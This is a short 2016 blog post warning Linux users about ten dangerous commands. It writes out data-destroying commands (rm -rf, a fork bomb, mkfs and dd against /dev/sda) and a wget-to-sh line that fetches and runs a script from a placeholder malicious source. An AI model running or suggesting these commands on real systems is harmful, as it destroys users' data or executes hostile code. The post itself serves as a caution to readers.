10 Linux commands you should never execute

by | Mar 21, 2016

ETIQUETAS: Hot news | Linux-en | Tips

Linux commands are useful and productive, but sometimes they may be dangerous, specially when you are not an expert on the tasks you are performing.

That's why it is highly recommended to double chek these commands below before executing them:

-rm -rf: It is one of the fastest way to wipe out a folder and its content.

-:(){:|:&};:: It keeps on executing one function again and again untill the system freezes.

> /dev/sda: It replaces all data on a block, resulting on a total loss of those data.

mv folder /dev/null: It moves all the contents of a user directory to /dev/null.

wget http://malicious_source -O- | sh: It downloads and executes a script from a malicious source.

mkfs.ext3 /dev/sda: It formats sda block and leaves the system into unrecoverable stage.

> file: It deletes the content of a file.

^foo^bar: It is used to edit previously executed commands without the need of retyping them, so the changes to be made need to be thoroughly checked.

dd if=/dev/random of=/dev/sda: It wipes out the sda block and adds junk data, so it leaves the system at inconsistent and unrecoverable stage.

Hidden the Command: It wipes root partition.

To dig deeper into the consequences of executing these commands, have a look at this article: 10 Most Dangerous Linux Commands



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